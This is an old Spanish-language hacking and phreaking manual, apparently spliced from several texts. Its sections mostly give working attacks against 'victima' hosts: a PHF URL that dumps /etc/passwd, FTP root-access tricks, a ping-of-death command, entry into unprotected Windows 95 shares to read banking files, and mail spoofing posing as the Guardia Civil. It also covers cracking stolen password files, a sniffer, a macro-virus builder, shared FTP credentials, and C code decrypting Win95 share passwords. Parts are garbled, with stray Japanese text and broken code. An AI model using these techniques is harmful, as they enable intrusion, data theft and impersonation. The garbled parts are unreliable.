NETWORK
Rastreandonos
=============
Los registradores de pluma (En ingles Pen register), son
dispositivos utilizados por la compa、ia telefonica (tambien les
llaman project) para descifrar los tonos utilizados por las Blue
Box.
Esto significa, que si tuvieras un registrador en la linea,cada
tecla de BlueBox que pulsaras, seria registrada y grabada en una
cinta. De forma que se puede adivinar a donde llamas. Si
sospechas que tienes una 'pluma' en la linea, mi consejo es que
no phreakees.
Es muy caro poner una pluma en la linea de cada phreaker, asi
que solo lo haran con los que sospechen. y no durante mucho
tiempo. Asi que si te rastrean, cesa en tus actividades durante
un mes o dos y todo volvera a la normalidad. la gente que cree
escuchar voces tras cortar el enlace o piensa que siempre estan
rastreandolo, o son paranoicos perdidos o han visto muchas
peliculas.
Otros peliculeros hablan de blue-tracers en centrales diferentes
a la nuestra y ademas hasta la bautizan como dark light..... Alla
ellos con su ingenuidad.
BLACK BOX
= Me maravilla que aun estemos peleandonos con las BlackBoxes.
Intentare (si alguien me tacha de sabelotodo, como paso con los
passwords de defecto, desde luego sera lo ultimo que escriba).
A proposito de estos mensajes,me gustaria que algun sysop se
ofreciera a abrir un area de ficheros (o ponerlos como
boletines), asi cualquiera podra localizarlos rapidamente y se
podran usar caracteres por encima del ascii 128.
TEORIA DE LA BLACKBOX
=====================
Lo que esta maravilla en peque、o hace, es mantener el voltaje de
la linea en 10V incluso despues de que se haya levantado el
telefono (Al descolgar, la linea sube a unos 48 Voltios). de esta
forma, los equipos de tarificacion de telephonica, no detectan
que se ha descolgado y no tarifican la llamada.
http://es.geocitties.com/guiadeenlaces
COMO ESCONDER SU DIRECCIÓN IP
Cuando navega por Internet va dejando un rastro con su dirección IP por donde pasa y todo cuanto hace. Si desea navegar de una forma totalmente anónima le proponemos SafeWeb.
Para navegar de incognito por Internet solo tiene que acudir a la pagina de SafeWeb "www.safeweb.com" e introducir la dirección del sitio al que desea entrar.
A partir de ese momento navegará de forma totalmente anónima y de forma normal como siempre, pero sabiendo que SafeWeb enmascara su IP y quedará registrada la IP de SafeWeb por todos los sitios que pase, siendo imposible llegar hasta su máquina y relacionarle con todo lo que usted haga.
<a src"http://www.terra.es/personal7/ltaberna/Troyano/PTKKAS.html " >Troyano</a>
貴社いよいよご隆盛のこととお慶び申し上げます。平素は当店を御利用いただき御厚情のほど、心より御礼申し上げます。冬の名残のまだ去りやらぬ時候、貴行ますますご清栄のこととお慶び申し上げます。日頃は格別のお引き立てをいただき、ありがたく御礼申し上げます。
AQUI TERMINA LA PRIEMRA PARTE DE MI MANUAL
SE QUIERES MAS INFORMACION O OTRO MANUAL EVIA TUS COMENTARISO
Y CUIDADO CON LOS FEDERALES AMERICANOS
Silencio_max@hotmail.com
Valgensing_2421@yahoo.com
Hacker_online@Gmail.com
c:>ftp <- Escribimos FTP.
ftp> <- activado el modo FTP.
Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los
comandos disponibles del FTP, como no viene a cuento no los explicare pero
buscando por hay podras hallar informacion de lo que hace cada cosa pero
lo mejor es que lo averigues tu solito.
3c. Telnet.
Por suerte los usuarios de win95 con el telnet tienen mas suerte o menos
segun se mire, ya que el servico de Telnet de win95 que tambien esta
incorporado en el sistema, es muy facil de manejar y ademas tiene ventana
propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que
tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aqui
la de "sistema remoto", entonces se activara otra ventana en la que
nos saldra tres opciones, la primera "nombre de host" es donde queremos
conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo
tenemos "tipo de terminal" que no hace falta cambiarlo.
El telnet es importante ya que es asi como entramos a una cuenta en un
servidor y podremos hacer lo que tengamos permitido en el sistema.
Logicamente entraremos en una cuenta si tenemos el login y password.
4. Hacking Basico En Windows.
Por fin ya se a acabo el latazo de la explicacion de como moverse por
win95. Ahora ya podemos empezar a jugar un poco por inet , siempre
por puro placer pero jamas con malos fines.
En esta seccion os explicare varias maneras de hacking usando el win95 a
pelo o sea sin utilizar ninguna herramienta externa.
4a. Phf.
La primera tecnica ya es muy conocida y la verdad es que tendremos suerte
si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay
que saber buscar y tener paciencia.
Para que esto nos funcione solo tenemos que tener un navegador instalado
en nuesto win95, por defecto suele venir el IE o sea que no podras decir
que no tienes, siempre y cuando hallas instalado los paquetes extras.
Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que
corra sobre unix (muchos). Conectamos con un servidor en cuestion,
www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le
aÏadimos:
http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Como ya he dicho si todo sale bien nos aparecera el fichero de passwords
del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto
el PHF tiene muchas variantes por eso te aconsejo que busce algo que
profundice en esta tecnica al igual que tambien busce informacion sobre
el fichero passwd de unix para comprenderlo.
4b. Ftp.
Antes ya te he explicado el funcionamiento del FTP de win95, ahora lo
usaremos para sacer el fichero de password de un servidor. Desde una
ventana del MS-DOS llamamos al programa FTP y escribimos:
ftp> open victima.com
Conect to victima.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> dir (o lo que querramos)
Y como siempre es el caso si todo sale bien estaremos metidos en el
sistema como root (en lenguaje unix significa el superusuario, o sea el
que controla el servidor). Por desgracia esta tecnica es muy antigua por
lo que mas seguro no funcionara pero todo es posible.
4c. Ping De La Muerte.
Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir
Cracker para no ofender a nadie ya que unicamente sirve para tirar un
servidor o sea que se desconecta de Internet y esto puede representar
grandes perdidas a una empresa. Con esto solo os quiero decir que aunque
aqui os lo explicare no es cuestion que lo useis por Internet atacando
servidores.
La utilidad Ping sirve principalmente para saber si un servidor esta activo
y ademas podemos calcular el trafico en la red segun el tiempo de su
respuesta. Basicamente se le envia un paquete a un servidor y este nos
contesta, solo que si se le envia un paquete muy grande puede llegar
desordenado, por lo que el servidor pide al origen que le vuelva a enviar
una parte o la totalidad del paquete, por lo que se produce un datagrama
del ping muy grande y producira su caida. Para ejecutar este ataque solo
tenemos que escribir :
c:>ping -l 65510 victima.com
Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes
de hacer tonterias leed la parte sobre seguridad de la guia.
4d. Recursos Compartidos.
Como win95 NO tiene seguridad nos permite colarnos en el disco duro de
otra persona por Internet y lo mejor del caso es que esta tecnica nos la
proporciona los propios programas del win95. Por supuesto no todo es tan
sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala
configuracion del propio usuario al no configurar adecuadamente los
recursos compartidos de su red corriendo sobre win95.
Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador
bien configurado, o sea el compartir recursos bien puesto y tambien tener
el Netbios instalado. Para configurarlo, tenemos que tener activado la
opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.
SI por el caso la opcion esta desactivada simplemente pulsamos el boton de
"aÏadir" y aÏadimos el servicio "Compartir ficheros e impresoras en redes
Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion"
en "Cliente para redes Microsoft". Tambien tiene que estar activado el
"Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso
Telefonico a Redes->Conexion a Inet que usaremos->boton derecho->
propiedades, debiendo estar activada la casilla "conectarse a la red".
Ahora ya podemos ponernos manos a la obra, entonces volvemos a una
ventana del MS-DOS y ejecutamos:
c:>nbtstat -A (IP DE LA VICTIMA)
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
VICTIMAMACHINE <00> UNIQUE Registered
VICTIMAGROUP <00> GROUP Registered
VICTIMAMACHINE <03> UNIQUE Registered
VICTIMAMACHINE <20> UNIQUE Registered
VICTIMAGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
Cuando ejecutamos este comando nos saldra una tabla como esta y el
primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes
ver la maquina se llama VICTIMAMACHINE.
Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso
encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP
y el nombre de la maquina en cuestion, esto seria de la siguiente forma:
c:>edit c:windowssystem32LMHOSTS
VICTIMAMACHINE
Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos
un comando para aÏadir el ordenador de la victima a nuestro Netbios y
esto seria de la siguiente forma:
c:>NBTSTAT -R
Ahora nos interesa saber que recursos comparte la victima y esto tampoco
nos traera complicacion alguna:
c:>net view VICTIMAMACHINE
Shared resources at VICTIMAMACHINE
Sharename Type Comment
-----------------------------------------
BANCO Disk
Y como podemos observar comparte una carpeta llamada BANCO.
Ahora ya podemos operar como si fuese una terminal mas en nuestra red local
sobre win95. Ya solo nos queda ejecutar el comando que querramos, si por
ejemplo queremos ver el contenido, solo tenemos que escribir:
c:> dir VICTIMAMACHINEBANCO
O para leer cualquier fichero de la carpeta:
c:> type VICTIMAMACHINEBANCOCUENTABANCARIA.TXT
Si queremos conectar al recurso compartido de forma grafica (o sea con
una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar
INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible
si hemos aÏadido la VICTIMAMACHINE a una unidad de red a la que podamos
llamar, deberemos ejecutar:
c:>NET USE e: MIPCWINDOWS
Esta tecnica solo funciona si la maquina remota ejecuta win95 o win 3.11 y
ademas comparte las carpetas sin contraseÏa en modo "Acceso a nivel
compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase
el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en
esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina
para que este autorizada, esto lo conseguiremos con el Regedit, por
desgracia los sistemas win95 y OSR2 que estan ejecutando el Servidor Web
Personal de Microsoft desactivan esta posibilidad de acceso remoto tras
informar de la conveniencia de hacerlo al usuario, ya que el servidor web
obliga a compartir carpetas aun sin tener red local.
Logicamente un usuario que haya tenido el despiste de conectarse a Internet
con carpetas compartidas no toma luego medidas de control sobre quien
entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser
pillados si por ejemplo un usuario ejecuta el programa Netwatch, que
muestra los usuarios conectados a nuestra computadora en cada momento y por
supuesto el nombre de las computadoras por lo que es aconsejable cambiar el
nombre de nuestra computadora usando el Regedit. Si nuestra maquina se
llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con
el Regedit a un nombre menos sospechoso.
Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra
computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos
una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se
dara cuenta de nuestra entrada. Tambien hay que decir que si la
VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo
"hay otros usuarios conectados a su ordenador, si apaga se desconectaran"
si ocurre esto seremos pillados.
4e. Fake Mail Con El Telnet.
Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
querramos . La verdad es que tiene pocos usos, en mi opinion debido a
una serie de razones pero siempre puede servir para gastar una buena
broma enviando aun amigo un mail del director de la Universidad diciendo
que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la
Guardia Civil.
La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
unas ciertas medidas de seguridad, que ya explicare luego. Lo primero
que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del
Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner
el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos
a que nos conectemos a ese puerto, cuando conectemos nos saldra un
mensaje y esta esperando a que pulsemoa alguna tecla:
220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)
Muchas veces lo que podemos hacer es escribir "help" y saldran todos los
comandos, tambien podemos escribir "echo" y la maquina nos contestara que
esta lista. Para escribir un mail hay que seguir una serie de pasos:
mail from:gc.uco@mad.servicom.es <- ponemos de donde viene.
El servidor nos contesta:
250 <gc.uco@mad.servicom.es> ... Sender Okay
Ahora escribimos:
rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos.
El servidor nos contesta:
250 <nob_ody@xxxxxxxx.com> ... Recipiant Okay
Ahora escribimos:
data
El servidor nos contesta:
354 Enter mail, end with "." on a line by itself
Ahora escribimos:
To: nob_ody@xxxxxxxx.com
From: gc.uco@mad.servicom.es
Subject: Te querremos!!
Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te
querremos fichar para el departamento.
Direccion General de
la Guardia Civil
. <- para terminar el mail.
El servidor nos contesta:
250 Mail accepted
Ahora escribimos:
quit <- ya esta todo listo
Pues ves como es realmente simple!! Pero antes de empezar a jugar con
esta tecnica tenemos que asegurarnos que el servidor de mail no regrista
nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a
alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail
sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet
sobre servidores que permiten hacer esto.
4f. Cambiando El Entorno.
Esta tecnica no es que sea propia del hacking ya que solo sirve para
cambiar la pantalla de inicio o la de finalizar windows. Los logos de
windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros
con extension SYS pero siguen siendo realmente BMP'S.
El logo del principio de windows (ya sabes el de las nubes) lo podeis
encontrar como:
c:>logo.sys
Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo
y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro
grafico y si lo volvemos a quitar, usara el de siempre. El logo del final
(cuando cierra windows) esta en el directorio windows y lo podemos
encontrar como:
c:windows>logos.sys
Logicamente es obligatorio que los graficos que querramos sustituir
tengan de tamaÏo 320x400 y sean ficheros BMP'S. Conviene que les pongamos
el atributo de ocultos, que esto se hace con el comando Attrib, por
ejemplo:
c:windows>attrib +h logos.sys <- lo oculta.
c:windows>attrib -h logos.sys <- lo hace visible.
4g. Finger.
La utilidad Finger, muy usada en Unix, en realidad no esta disponible en
Win95 pero como somos Hackers nosotros si que somos capaces desde Win95.
Finger se utiliza para obtener informacion de un servidor. Puede parecer
una tonteria pero es util, por ejemplo, podemos empezar a sacar los Login's
de los usuarios y empezar a adivinar sus passwords, tambien podemos
vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la
ultima vez que estuvo, etc...) y asi muchas cosas.
La verdad es que para usar el Finger usaremos cualquier navegador, IE o
Netscape. Simplemete nos dirigimos a un url un poco especial, es un web
que permite hacer Finger a cualquier host y nos deveulve los resultados.
Esto se conoce como "Finger Gateway". El url del web es:
http://www.hgp.med.umich.edu/cgi-bin/finger
4h. Whois.
La utilidad Whois, al igual que Finger es muy comun en Unix y no esta
disponible en Win95 pero comos somos asi de listos saldremos del apuro.
Tambien sirve para pedir informacion de un servidor pero no el igual que
Finger, ya que se diferencian en el tipo de informacion, el finger se suele
utilizar mucho para buscar direcciones de correo mientras que el Whois,
para averiguar informacion sobre un servidor en concreto.
Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un
host muy especial:
c:>telnet whois.internic.net
Por supuesto Internic, una empresa privada norte ameriacana que se
encarga de controlar los dominios de Internet, y podemos usar su base
de datos para pedir informacion sobre un servidor.
Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_
del_servidor" y nos sacara la informacion.
telnet InterNIC > whois aol.com
Connecting to the rs Database . . . . . .
Connected to the rs Database
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA
Domain Name: AOL.COM
Administrative Contact:
O'Donnell, David B (DBO3) PMDAtropos@AOL.COM
703/453-4255 (FAX) 703/453-4102
Technical Contact, Zone Contact:
America Online (AOL-NOC) trouble@aol.net
703-453-5862
Billing Contact:
Barrett, Joe (JB4302) BarrettJG@AOL.COM
703-453-4160 (FAX) 703-453-4001
Record last updated on 13-Mar-97.
Record created on 22-Jun-95.
Domain servers in listed order:
DNS-01.AOL.COM 152.163.199.42
DNS-02.AOL.COM 152.163.199.56
DNS-AOL.ANS.NET 198.83.210.28
Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto
es lo que nos ha sacado Internic. Al final podemos ver los dominios
asociados a AOL. Pues sencillo y muy util, el whois.
4i. Tracert.
Esta utilidad que si esta implementada en Win95, nos sirve para calcular
el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos
saber por cuantos servidores pasa. Muy util para sacar posibles servidores
victimas si nos llaman la atencion.
Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert,
a secas y nos sacara el menu de opciones disponible.
c:>tracert
Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.
Pues como veis, no tiene ningun misterio las opciones del Tracert, por
lo que ya aprendereis su uso con la experiencia. Ahora escribimos una
direccion IP cuando invocamos al Tracert, de la siguente forma:
c:>tracert 198.83.210.28
Tracing route to dns-aol.ans.net [198.83.210.28]
over a maximum of 30 hops:
1 * * * Request timed out.
2 138 ms 145 ms 135 ms 204.134.78.201
3 212 ms 191 ms 181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
4 166 ms 228 ms 189 ms enss365.nm.org [129.121.1.3]
5 148 ms 138 ms 177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
6 284 ms 296 ms 178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
7 298 ms 279 ms 277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
8 238 ms 234 ms 263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
9 301 ms 257 ms 250 ms dns-aol.ans.net [198.83.210.28]
Trace complete.
Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado
al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.
5. Utilizacion De Tools.
En esta seccion os explicare diferentes tools que podeis usar para hacking,
por supuesto hay que buscarlas por Internet, no pondre el url para
encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe,
pero os dire como se llama el programa asi lo podras buscar ademas esto
tambien te servira para que te espabiles y sepas buscar cosas por Internet.
Logicamente esta guia es para win95 y los programas que explicare seran
para win95 pero tambien me veo obligado a explicar varias tools que no
son de win95 propiamente sino de MS-DOS pero que son necesarias y ademas
corren en modo MS-DOS de win95.
5a. Skamwerks lab version 1.1b
Este programa es un util herramienta que nos ayuda a crear de forma rapida
virus macro, o sea para el Word. Tiene que estar instalado el Word para
que este programa nos funcione.
Al ejecutar el programa nos aparecera una ventana con 2 botones los caules
son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".
El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus
de macro ya que nos moveremos por varios menus y crearemos un virus de
forma rapida y facilmente. La otra opcion, "Advanced Users" es para
aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya
que podemos meter codigo Word basic directamente y asi crear un virus a
nuestro gusto.
Como este no es un curso sobre virus, no me voy a enrollar sobre la
utilizacion exacta del programa. En mi opinion es un buen programa,
en ingles programado en C++.
5b. WaReZ! Version 95.12.31
Este programa es un cliente FTP que muestra los directorios ocultos en un
servidor, util si nos metemos en algun sitio sospechoso. Como ya es
costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL
correctamente.
Al igual que antes tampoco hay que explicar mucho sobre este programa ya
que su Interface es igual que el cliente WS_FTP que suele ser muy familiar
para todos, por lo que no encontraremos mucha dificultad en su manejo.
5c. John the ripper v1.4.
Esta magnifica tool no es propiamente de win95 pero seria un pecado no
hablar de ella, cuando corre sobre win95 de maravilla (bueno, dentro de lo
que cabe . John, como se le conoce, sirve para crackear un fichero unix
de password (el conocido etc/passwd, como ya digo aprended algo de unix).
Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer
es usar el John para sacar cuentas, pero no solo basta esto sino tambien
necesitamos un buen diccionario y una combinacion de suerte y paciencia.
Supongamos que ya tenemos todo (fichero passwd, John y un diccionario),
entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo
llamamos sin nigun parametro nos saldran un listado de opciones, esto seria
asi:
c:>john
Usage: john [flags] [passwd files]
Flags:-pwfile:<file>[,..] specify passwd file(s)
-wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
-rules enable rules for wordlist mode
-incremental[:<mode>] incremental mode [using john.ini entry <mode>]
-single single crack mode
-external:<mode> external mode, using john.ini entry <mode>
-restore[:<file>] restore session [from <file>]
-makechars:<file> make a charset, <file> will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:<login|uid>[,..] crack this (these) user(s) only
-shells:[!]<shell>[,..] crack users with this (these) shell(s) only
-salts:[!]<count> crack salts with at least <count> accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout:<time> abort session after a period of <time> minutes
-list list each word
-beep -quiet beep or don't beep when a password is found
-noname -nohash don't use memory for login names or hash tables
-des -md5 force DES or MD5 mode
Veis? , y como siempre no explicare que es cada opcion os lo dejo para
que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero,
para ello escogermos la opcion "single", ya que el john no nos pedira
un fichero de diccionario, si fuese el caso que no tenemos, ponemos:
c:>john -single passwd
Y el John se pondra a trabajar, cuando halla acabo creara un fichero
llamado "John.pot" donde se almacenaran los passwords encriptados con
su correspodiente passwords desencriptado (esta definicion no es del
todo correcta pero es para que lo entendais) y ya tenemos unas cuentas
de acceso al servidor.
Este metodo va bien para la primera pasado con el John pero luego conviene
usar un diccionario y con el diccionario seria de la siguiente manera:
c:>john -wordfile:spain.txt passwd
El John seguiria el mismo proceso antes descrito, por supuesto si el
fichero "John.pot" esta creado ya, les aÏadira los resultados obtenidos
a este fichero, por cierto este fichero tiene atributo de solo lectura.
Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis
a manejar correctamente. Referente a los diccionarios hay varias
herramientas que corren bajo MS-DOS que crean diccionarios o tambien
podeis buscar por Internet ya que hay varios web's llenos de diccionarios.
5d. Gobbler v 2.1.
Volvemos a la carga con otro programa que no es del win95 propiamente, pero
es un sniffer que podemos usar bajo win95 en una red Ethernet. Un Sniffer
para aquellos que no sepan, es un programa que captura los paquetes que
pasan por una red y asi se pueden conseguir logins, passowrds u otro tipo
de informacion que querramos, logicamente si los paquetes estan encriptados,
esto dificultara el proceso, ya que habra que desencriptarlos si se puede.
Como siempre abrimos una ventana y ejecutamos el programa de la siguiente
manera:
c:>gobbler
Y se activara el programa y veremos una serie de ventanas, en este punto,
pulsamos el <ESC> y saldra una ventana con un menu. Ahora tenemos que
configurar el programa para nuestra red, la verdad es que es muy sencillo
de utilizar, con un poco de practica dominaremos este sniffer facilmente.
Como sugerencia conviene leer el fichero de documentacion que trae, ya
que explica como configurar el programa.
5e. Modificando el WS_FTP.
El famoso cliente ftp WS_FTP, se le puede aÏadir un host remoto el cual
esconde mucho software interesante. Esta opcion no esta por defecto,
simplemente hay que aÏadir una lineas en el fichero "WS_FTP.ini".
Tenemos que aÏadir, al principio del fichero:
[208.128.143.19]
HOST=24.48.3.45
UID=cmw
PWD=636E79
LMASK=
RMASK=
RETRIES=20
PASVMODE=0
COMMENT=
Simple, verdad? Pues ahora cuando le digamos al cliente que se diriga al
host 208.128.143.19 (que no es la dirrecion real, pero da igual). Pues
que os divertais con esta cuenta y coged todo lo que podais, porque
a saber cuanto tiempo estara vigente.
5f. Sharepasswd.
Este programa desencripta el passorwd de win95. Esta en lenguaje C, como
supongo todo el mundo tiene que tener un compilador en C y si no ya estas
buscando uno, que hay muchos y gratis por Internet. No veo la necesidad
de explicaros el programa ya que tambien incluyo la explicacion del
autor la cual esta muy bien, logicamente.
/* This program takes an 'encrypted' Windows 95 share password and decrypts it
* Look at:
* HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanMan
* to find a machine's shares. Within the data for each share are two
* registry entries, Parm1enc and Parm2enc. Parm1enc is the "Full access"
* password. Parm2enc is the "Read only" password.
*
* David Ross 2/9/96
* snakey@cs.umd.edu
*
* Do not distribute this program for any commercial purpose without first
* contacting me for permission.
*
* DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
*
* A technical description of the 'code' can be found later on in this
* document.
*
* Oh yeah... a totally unsolicited self promotion here... If anyone has
* a job for a junior year Computer Science student for summer '96, please
* let me know! I'm familiar with Windows and Mac networking (especially
* involving TCP/IP), fluent in C and C++, and working on becoming a
* proficient Windows programmer.
*
*/
#include <stdio.h>
#include <string.h>
#define BUFFER 30
int DecodeCharOne(unsigned char *);
int DecodeCharTwo(unsigned char *);
int DecodeCharThree(unsigned char *);
int DecodeCharFour(unsigned char *);
int DecodeCharFive(unsigned char *);
int DecodeCharSix(unsigned char *);
int DecodeCharSeven(unsigned char *);
int DecodeCharEight(unsigned char *);
main() {
int i; /* Generic counter */
int eocc = 0; /* Records if there has been an error */
/* The following structure stores the encoded bytes. Decoded values
* replace the encoded values as the decoding process moves along
* The initial values show here are not used and are unimportant
*/
unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
unsigned short tempshort; /* Used as a go-between from sscanf() to
mybytes[] so unaligned data accesses
don't occur */
int goupto = 0; /* Records how many characters there are to be decoded */
/* The following code handles input */
char inpt[BUFFER];
char *inptptr;
printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
fgets(inpt, BUFFER, stdin);
inptptr = strtok(inpt, " ");
if (inpt[0] != 'n')
while ((inptptr != NULL) && (goupto < ) {
sscanf(inptptr, "%hx", &tempshort);
mybytes[goupto++] = tempshort;
inptptr = strtok(NULL, " ");
}
/* Decode all the characters. I could have made this stop immediately
* after an error has been found, but it really doesn't matter
*/
if (!DecodeCharOne(&mybytes[0])) eocc = 1;
if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
if (!DecodeCharThree(&mybytes[2])) eocc = 1;
if (!DecodeCharFour(&mybytes[3])) eocc = 1;
if (!DecodeCharFive(&mybytes[4])) eocc = 1;
if (!DecodeCharSix(&mybytes[5])) eocc = 1;
if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
if (!DecodeCharEight(&mybytes[7])) eocc = 1;
/* If the password could be decoded, print it */
if (eocc) printf("The encrypted password is invalid.n");
else {
printf("The decoded password is: "");
for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
printf(""n");
}
} /* End of main() */
/*